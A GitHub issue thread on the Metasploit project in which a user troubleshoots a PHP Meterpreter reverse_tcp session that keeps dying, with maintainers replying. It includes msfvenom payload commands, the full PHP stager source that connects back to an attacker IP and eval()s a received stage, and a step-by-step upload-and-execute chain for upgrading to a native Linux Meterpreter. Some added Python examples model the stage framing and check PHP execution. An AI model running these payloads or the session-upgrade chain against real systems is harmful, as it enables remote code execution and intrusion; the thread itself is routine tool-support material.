rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

PHP Meterpreter session is invalid and gets closed #7638

Closed githubnan123 closed 7 years ago

githubnan123 commented 7 years ago

Steps to reproduce

How'd you do it?

  1. msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=443 -f raw > /root/var/www/html/test.php

  2. msfconsole

  3. use exploit/multi/handler / set payload php/meterpreter/reverse_tcp

  4. set LHOST 192.168.0.186 / set LPORT 443

  5. exploit

  6. Then the victim (192.168.0.197) connects to 192.168.0.186:443/test.php. By the way, is the victim PC supposed to start a download? Because whenever I connect to this site, the PC starts downloading "test.php".

Expected behavior

What should happen? I should see the connection and be able to use commands like sysinfo and screenshot etc. The session should probably last longer than 15 sec :/

Current behavior

I DO see a new session and it opens, but here are the issues: I do not have the normal Meterpreter commands like screenshot, sysinfo etc., but these instead:

Core Commands
=============

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
help                      Help menu
info                      Displays information about a Post module
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sess                      Quickly switch to another session
set_timeouts              Set the current session timeout values
use                       Deprecated alias for 'load'
uuid                      Get the UUID for the current session
write                     Writes data to a channel

And the session only lasts for about 15 sec (my focus is still on the Meterpreter commands). It says "Meterpreter session .. closed. Reason: Died" all the time too. And then I wanted to see what would happen if I used the command machine_id, but then it said that it failed because the current session is closed, and that was after 5 sec... Anyway, I am still most concerned about why I do not have the "normal" Meterpreter commands.

System stuff

Kali Linux 2016.2

Metasploit version

4.13.1-dev

How can I fix this? Thanks! Help is much appreciated!!

wchen-r7 commented 7 years ago

I can't say for sure, but this reminds me of: https://github.com/rapid7/metasploit-payloads/issues/95

githubnan123 commented 7 years ago

Hi @wchen-r7, I do not really know, because the connection does get successfully established and is there for some seconds, so not AS SOON as the session is found... But what about the commands? I mean, how can I not have the "normal" commands like screenshot and sysinfo? Thanks for your time.

And did you fix your issue by updating your PHP version? Just to verify.

wchen-r7 commented 7 years ago

PHP meterpreter doesn't necessarily have all the commands you see in Windows meterpreter. Personally, I would suggest you upgrade to a platform-specific meterpreter (such as Windows or Linux) as soon as you get a session with the PHP meterpreter in order to access more functionality.

My concern is more on the session dying part. I will at least try to see if I can reproduce this. I will let you know. Thanks!

githubnan123 commented 7 years ago

Well thanks!! But if you get it reproduced, can you then answer these questions:

  1. Is it normal that the browser starts downloading the test.php when going to [ip of attacker]:[port]/[file]? Does the same thing happen to you?
  2. Do your sessions die fast?
  3. How can you upgrade to a platform-specific meterpreter AFTER you get a session?

Thanks! I really appreciate your time :))

wchen-r7 commented 7 years ago

I can answer 1 and 3 for you now.

For question 1, normally it should not be downloading the file. If it does, that tells me the web server is probably serving the browser some kind of inappropriate content type header? This may not be a big issue though as long as the web server is parsing PHP code. If you see the PHP code from the browser, then that's bad.

For question 3, um... well, this requires the session to stay alive first. I normally just generate an executable from msfvenom (for example: ./msfvenom -p linux/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=4444 -f elf -o payload.bin), use the upload command to upload this binary to a directory you can write to, and then use the execute command to run it.

There is definitely more than one way to upgrade. If you are attacking Windows, you can also use the exploits/multi/script/web_delivery to upgrade to a different meterpreter.

OJ commented 7 years ago

1 tends to mean that the target web server isn't configured to run .php files with the PHP interpreter. This will happen if you upload a .php file to an IIS server running .NET, for example.

githubnan123 commented 7 years ago

Well, at least it seems to work even though the browser is downloading the content (I am using Chrome on the victim machine). @OJ, you mentioned something about configuring the server to run PHP? I simply uploaded the file to /var/www/html/ on my Linux. Should that not work? @wchen-r7, is this a good answer to 3: http://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ ? (Reminder: I am not asking you because I am too lazy to try it, I am just not home yet.) The content of the generated .php file located in www/html/ is:

/*<?php /**/ error_reporting(0);
$ip = '192.168.0.186';
$port = 6666;
// pick whichever socket API this PHP build offers
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = $f("tcp://{$ip}:{$port}");
    $s_type = 'stream';
} elseif (($f = 'fsockopen') && is_callable($f)) {
    $s = $f($ip, $port);
    $s_type = 'stream';
} elseif (($f = 'socket_create') && is_callable($f)) {
    $s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) { die(); }
    $s_type = 'socket';
} else {
    die('no socket funcs');
}
if (!$s) { die('no socket'); }
// read the 4-byte big-endian length of the stage the handler sends
switch ($s_type) {
    case 'stream': $len = fread($s, 4); break;
    case 'socket': $len = socket_read($s, 4); break;
}
if (!$len) { die(); }
$a = unpack("Nlen", $len);
$len = $a['len'];
// read exactly $len bytes of stage, then run it
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream': $b .= fread($s, $len-strlen($b)); break;
        case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();

Thanks so much for your time!!
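The stager posted above is a small, fixed protocol: it connects back, reads a 4-byte big-endian length, keeps reading until exactly that many bytes have arrived, and eval()s them. The following is an added example in Python (not Metasploit's code and not part of the issue) that reproduces both halves of that exchange over a socketpair so it can be run offline. The stage body is a constructed placeholder, nothing is eval()ed, and the helper `looks_like_framed_stage` is an assumption of mine for telling a blob with this framing apart from an HTTP response.

```python
"""Stage framing used by the php/meterpreter/reverse_tcp stager shown above.

Added example in Python; it is not Metasploit's code. The PHP stager reads a
4-byte big-endian length (unpack("Nlen", ...)), loops until exactly that many
bytes have arrived, then eval()s them. Both halves of that exchange are
reproduced here over a socketpair. The stage body is a constructed
placeholder, not a real Meterpreter stage, and nothing is eval()ed.
"""
import socket
import struct

# Constructed placeholder for what the handler would send; not a real stage.
SAMPLE_STAGE = b"<?php /* placeholder stage */ echo 'staged'; ?>"


def frame_stage(stage: bytes) -> bytes:
    """Handler side: prefix the stage with its length as a 4-byte big-endian int."""
    return struct.pack(">I", len(stage)) + stage


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes, mirroring the PHP while (strlen($b) < $len) loop."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before the full stage arrived")
        buf.extend(chunk)
    return bytes(buf)


def read_stage(sock: socket.socket) -> bytes:
    """Stager side: read the length header, then the stage body. No eval()."""
    (length,) = struct.unpack(">I", recv_exact(sock, 4))
    return recv_exact(sock, length)


def stage_exchange(stage: bytes = SAMPLE_STAGE, chunk_size: int = 7) -> bytes:
    """Run both halves over a socketpair and return what the stager received.

    The handler side deliberately writes in small chunks to show that the
    stager's read loop reassembles a stage that arrives fragmented.
    """
    handler, stager = socket.socketpair()
    try:
        framed = frame_stage(stage)
        for i in range(0, len(framed), chunk_size):
            handler.sendall(framed[i:i + chunk_size])
        return read_stage(stager)
    finally:
        handler.close()
        stager.close()


def looks_like_framed_stage(data: bytes) -> bool:
    """Does a captured blob carry the handler's framing (length header + body)?

    Assumed helper, not part of Metasploit: it helps tell a file a browser
    "downloaded" from the handler port apart from a real HTTP response, whose
    first four bytes ("HTTP") do not decode to the length of the rest.
    """
    if len(data) < 4:
        return False
    (length,) = struct.unpack(">I", data[:4])
    return length == len(data) - 4
```

Because the handler writes this framed blob to whatever connects to its port, a browser pointed at the handler's LPORT receives it too; saving the result and running it through `looks_like_framed_stage` confirms whether a "downloaded" file came from the handler rather than from the web server.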

wchen-r7 commented 7 years ago

@nichlaspro That script is good for upgrading from a shell to a Meterpreter. You actually have a different scenario: You're switching from Meterpreter to Meterpreter.

githubnan123 commented 7 years ago

You cannot go from meterpreter to meterpreter, right? :/ That just confused me a little... In the videos I have seen about going from shell to meterpreter, they end up having commands like screenshot available, which is what I want too.

Update: Ahhh, I currently only have php-meterpreter, and what I need is a platform-specific meterpreter in order to make the wanted commands available. I think I got the point now! But how can I upload another payload using that PHP client? I mean, I have used PHP and not EXE for a reason. What I can think of would be to make an EXE payload using windows/meterpreter, but php/meterpreter does not have any commands that can upload it to the victim PC and execute it, so kind of hard to get to work, I think...

wchen-r7 commented 7 years ago

Hi @nichlaspro, I tried to look into this issue, and I'm not reproducing the problem.

The following log shows what I did. Basically, I got a session with php/meterpreter/reverse_tcp, and I waited for about 2 minutes:

msf exploit(handler) > date
[*] exec: date

Thu Dec  1 15:38:07 CST 2016
msf exploit(handler) > curl -s http://192.168.146.184/test.php
[*] exec: curl -s http://192.168.146.184/test.php

[*] Sending stage (34117 bytes) to 192.168.146.184
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.184:54134) at 2016-12-01 15:38:17 -0600

^CInterrupt: use the 'exit' command to quit
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)

msf exploit(handler) > date
[*] exec: date

Thu Dec  1 15:40:02 CST 2016
msf exploit(handler) > 

However, just because I'm not able to reproduce doesn't mean the bug doesn't exist. If you'd like, please provide me with some target info, such as: OS, version of the OS, what web server, PHP version, etc., so I can recreate the test environment as closely as possible.

wchen-r7 commented 7 years ago

@nichlaspro Also, here is an example of how you could switch from a PHP meterpreter shell to a Linux native. I'll be using 192.168.146.1 as an example for the attacker's IP:

  1. Create a Linux meterpreter as an executable:
./msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.146.1 lport=4444 -f elf -o elf.bin
  2. In msfconsole, assuming you already have a PHP meterpreter session:
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
  3. At the PHP meterpreter prompt, upload the binary that you generated with msfvenom. Notice I am uploading to /tmp:
meterpreter > cd /tmp
meterpreter > upload elf.bin 
[*] uploading  : elf.bin -> elf.bin
[*] uploaded   : elf.bin -> elf.bin
  4. Before you execute it, make sure the uploaded binary's permission is executable:
meterpreter > execute -f "chmod +x elf.bin"
  5. Now, you can execute it:
meterpreter > execute -f "/tmp/elf.bin"

[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
Process 6032 created.

[*] Sending stage (1495599 bytes) to 192.168.146.184
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.184:54136) at 2016-12-01 15:46:41 -0600
meterpreter >

The second session should be the native meterpreter:

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                                                                  Connection
  --  ----                   -----------                                                                  ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine                                       192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
  2   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54136 (192.168.146.184)

Also, please note that since we are on a bug tracking system, in here we need to stay on topic for the bug (of your session dying). If you need further training on Metasploit, please use our community website, where there is also Metasploit devs assisting. Thanks! :-)

githubnan123 commented 7 years ago

Hi again! Thank you so much. Now I have an idea of how to upgrade the shell, but look. I will now show you exactly what I do:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R > /root/Desktop/thisisphp.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes

root@kali:~# mv /root/Desktop/thisisphp.php /var/www/html/
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.1-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.186
[*] Meterpreter session 1 opened (192.168.0.186:4444 -> 192.168.0.186:35456) at 2016-12-02 09:11:46 -0500

meterpreter > sessions
[-] Unknown command: sessions.
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.186 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.197
[*] Meterpreter session 2 opened (192.168.0.186:4444 -> 192.168.0.197:49625) at 2016-12-02 09:13:58 -0500
[*] Sending stage (34117 bytes) to 192.168.0.197

meterpreter > cd
[-] Unknown command: cd.
meterpreter > cd /tmp
[-] Unknown command: cd.

[-] Meterpreter session 2 is not valid and will be closed

[*] 192.168.0.197 - Meterpreter session 2 closed.
meterpreter > 

So here are my final questions (I guess) that cover the still ongoing issues.

  1. On my Windows PC it is downloading the file instead of just showing the content, and I have to type the port in order to even make it start downloading. Is that optimal? Look: https://s18.postimg.org/4hkabwxjt/look.png

  2. So now the download of the PHP has started and a Meterpreter session has been opened, but again it was only up for about 10-20 seconds before it closed. Can that have something to do with this weirdness upon connecting to the PHP file on my Windows PC? How can I fix this then?

  3. As you can see, I tried to use the cd command in the Meterpreter, but then it said that it is an unknown command? I am really doing the exact same thing as other people, but it just does not seem to work? (sad story)

Something looks very wrong to me, can you help? That would really make my day :) (I am using Chrome on my Windows 8 machine and PHP version 7.0.12-1 on my Linux; btw, I have not started any services or anything.) Thanks, your time is much appreciated.

wchen-r7 commented 7 years ago

Hi @nichlaspro,

For question 1: The URL looks a little weird for me. You are connecting to http://192.168.0.186:4444/thisisphp.php.... so does that mean your web server is listening on port 4444? Normally web servers listen on port 80, so you would call your PHP meterpreter like this: http://192.168.0.186/thisisphp.php. Could you please clarify on that a little?

For question 2: I don't know for sure, because I'm unable to reproduce this problem. It works fine on my end, and I also tested it on PHP 7. Is it possible you're not on the latest master? Could you please try git clone https://github.com/rapid7/metasploit-framework.git and use that Metasploit Framework instead? That should give you the latest.

For question 3: Yeah, so when you receive a meterpreter connection, framework has to load stdapi to get the commands. That looks like it didn't. That means the session was not valid for some reason. I think if question 2 is resolved, we should automatically resolve question 3 as well.

githubnan123 commented 7 years ago

Okay, first of all, thank you so much for taking the time to help me! I know that it is not optimal that I have to write the port in the victim browser, but whenever I do that, the browser starts downloading the actual PHP file. When I do type 192.168.0.186/payloaddd.php in the victim browser, it says "This site can't be reached". Like there is some sort of issue in making the PHP file reachable. I have moved the generated PHP file to /var/www/, which I think is what you should do, but it does not seem to work.

I tried updating the Metasploit Framework, but it did not really seem to help much. Here is what I did:

root@kali:~# clone https://github.com/rapid7/metasploit-framework.git
bash: clone: command not found
root@kali:~# git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 382032, done.
remote: Compressing objects: 100% (99/99), done.
remote: Total 382032 (delta 45), reused 1 (delta 1), pack-reused 381932
Receiving objects: 100% (382032/382032), 282.55 MiB | 5.73 MiB/s, done.
Resolving deltas: 100% (277211/277211), done.
root@kali:~# sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R>payloaddd.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.1-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set URIPATH /upload/payloaddd.php
URIPATH => /upload/payloaddd.php
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf exploit(handler) > set uripath /
uripath => /
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...

So nothing happened from then, because when I typed 192.168.0.186/payloaddd.php in the victim browser, it said "This site can't be reached". But when I typed 192.168.0.186:4444/payloaddd.php, the browser started downloading a PHP file, and this is where the invalid session thing begins, I think. Anyway, when I start msfconsole it says:

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

Can that have anything to do with why it is not working? Update to the last part: I just found out that it said "failed to connect" when starting msfconsole because I had not started the postgresql service... Anyway, that does not solve the problem with PHP and all that.

wchen-r7 commented 7 years ago

Hi @nichlaspro, after you clone Metasploit Framework, make sure you cd to the directory, and then execute ./msfconsole, and not msfconsole. I suspect there are two different Frameworks installed on the machine.

githubnan123 commented 7 years ago

You are right, there are two. Let me just try to fix some installation errors and then I will see what the outcome is :)))

githubnan123 commented 7 years ago

Okay, so I successfully installed it and mounted it from home/metasploit-framework and then ran ./msfconsole. Then I set up the LHOST and port, payload, and exploited... but now I tried it on the actual attacker machine (Linux), where I typed the URL 192.168.0.186/payloaddd.php and Firefox said this:

Unable to connect

Firefox can't establish a connection to the server at 192.168.0.186. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.

Again, the payload PHP file is located in /var/www/. What is going on?

What I did:

Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
  get cucumber > 2 and this will fail on ruby 1.8.7

  gem 'cucumber', '~> 1.3.20'

With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
root@kali:~/metasploit-framework# ./msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.13.4-dev-f45b0e3                  ]
+ -- --=[ 1607 exploits - 914 auxiliary - 276 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler/
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...

Thanks again

void-in commented 7 years ago

@nichlaspro The reason you are able to connect to 4444 is because that is the port the handler is listening on. When you connect to it, the handler assumes that it has been contacted by the stager and gives you the meterpreter stage. This is not what you want.

First thing you need to verify is that you are actually able to connect to the web server. Make sure you can connect to http://192.168.0.186. You should receive something like "It works!" or a GET request in the HTTP server log. When that is done, placing the PHP file in the /var/www/ directory and calling it from the browser is straight forward.

If you are not able to connect to the web server in the first place, I am afraid it is not a Metasploit issue but rather something related to your web server setup.
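Two checks were suggested in the thread: first (void-in, above) that the web server is reachable at all on its own port, and second (wchen-r7, earlier) that requesting the .php file does not simply return PHP source, which would mean the server is not running the interpreter. The following is an added example in Python, not code from the issue or from Metasploit, that automates both. For the self-test it serves a constructed stand-in for the msfvenom output from Python's static `http.server`, which never executes PHP, so that server must be classified as leaking source; the category names and the `application/octet-stream` / `Content-Disposition` heuristics for "the browser will download this" are my assumptions.

```python
"""Is the web server actually executing the .php file, or just handing it back?

Added example in Python, not from the issue or from Metasploit. It automates
the two checks suggested in the thread: can the web server be reached at all
(a plain TCP connect, like loading http://<host>/ and expecting "It works!"),
and when the .php file is requested, does the body contain PHP source (the
interpreter is not running it), arrive as a download, or come back as
executed output. The self-test uses Python's static http.server, which never
runs PHP, so it must be classified as leaking source.
"""
import functools
import http.server
import os
import shutil
import socket
import tempfile
import threading
import urllib.error
import urllib.request

# Constructed stand-in for the msfvenom output; not the real stager.
SAMPLE_PHP = b"/*<?php /**/ error_reporting(0); die('placeholder');"


def can_connect(host: str, port: int, timeout: float = 2.0) -> bool:
    """TCP-level reachability of the web server (the "This site can't be reached" case)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def classify_response(status: int, headers, body: bytes) -> str:
    """Decide what the server did with the .php file (category names are assumed).

    source_leaked    - the PHP open tag is in the body: the server served the
                       file as-is instead of running it (the bad case)
    download_offered - served as an attachment or generic binary, so a browser
                       will save it; PHP may or may not have run
    executed         - a normal response with no PHP source in it
    error            - non-2xx status
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    if not 200 <= status < 300:
        return "error"
    if b"<?php" in body or b"<?=" in body:
        return "source_leaked"
    ctype = hdrs.get("content-type", "").lower()
    disp = hdrs.get("content-disposition", "").lower()
    if "attachment" in disp or ctype.startswith("application/octet-stream") or "php" in ctype:
        return "download_offered"
    return "executed"


def check_php_url(url: str, timeout: float = 5.0) -> str:
    """Fetch the URL and classify the result; 'unreachable' if there is no HTTP at all."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return classify_response(resp.status, resp.headers, resp.read())
    except urllib.error.HTTPError as e:
        return classify_response(e.code, e.headers, e.read())
    except (urllib.error.URLError, OSError):
        return "unreachable"


class _QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo output clean
        pass


def demo_static_server() -> dict:
    """Serve SAMPLE_PHP from a throwaway directory (no PHP interpreter) and check it."""
    tmp = tempfile.mkdtemp()
    with open(os.path.join(tmp, "test.php"), "wb") as f:
        f.write(SAMPLE_PHP)
    handler = functools.partial(_QuietHandler, directory=tmp)
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        base = f"http://127.0.0.1:{port}"
        return {
            "reachable": can_connect("127.0.0.1", port),
            "php_file": check_php_url(f"{base}/test.php"),
            "missing_file": check_php_url(f"{base}/missing.php"),
        }
    finally:
        server.shutdown()
        server.server_close()
        shutil.rmtree(tmp, ignore_errors=True)
```

Against a real target, call `can_connect(host, 80)` first; if that fails the problem is the web server, not Metasploit, exactly as void-in says. Only when `check_php_url("http://host/test.php")` returns `executed` (and a session follows) is the file actually being run; `source_leaked` is the "you can see the PHP code from the browser" case that wchen-r7 flags as bad.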

githubnan123 commented 7 years ago

How do I mark this as solved?

h00die commented 7 years ago

just click "Close" where you respond.

wchen-r7 commented 7 years ago

Closed for ya :-)